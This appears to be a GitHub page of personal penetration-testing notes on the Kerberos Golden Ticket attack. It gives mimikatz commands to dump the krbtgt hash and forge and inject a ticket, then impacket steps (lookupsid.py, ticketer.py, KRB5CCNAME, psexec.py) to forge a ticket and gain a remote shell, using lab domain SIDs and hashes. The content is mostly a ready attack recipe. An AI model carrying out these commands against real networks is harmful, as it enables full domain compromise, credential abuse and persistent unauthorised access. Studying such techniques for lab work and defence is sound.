Skip to content

Latest commit

 

History

History
63 lines (41 loc) · 1.91 KB

File metadata and controls

63 lines (41 loc) · 1.91 KB

🥇 Golden Ticket Attacks

Here we have the hash for kerberos ticket granting ticket with which we can gernerate ktgt.

  • Run mimikatz and privilege::debug

  • lsadump::lsa /inject /name:krbtgt and copy these 2 into notepad for later use

{% code overflow="wrap" %}

kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-3537832060-1456167142-1983014419 /krbtgt:b72f4a5ed9bef0f6a0ec3d4b5a4e4320 /id:500 /ptt

{% endcode %}

  • user can be anything
  • rid is 500 for admin
  • ptt means pass the ticket

  • We can access other computers on network dir \\THEPUNISHER\c$

  • psexec.exe \\THEPUNISHER cmd.exe to get a shell

Linux

  1. Since we have the krbtgt we can do a golden ticket attack: krbtgt:819af826bb148e603acb0f33d17632f8
  2. We need domain-sid so using powersploit: Powershell:
Get-DomainSID -Domain htb.local

Linux:

lookupsid.py CORP/[email protected]

Now using this info with impacket ticketer to get the golden ticket:

ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local user

Putting the ticket in our environment variable:

export KRB5CCNAME=DoesNotExist.ccache

Note: before psexec check if dns and time is configured properly

psexec.py -debug htb.local/administrator@forest -k -no-pass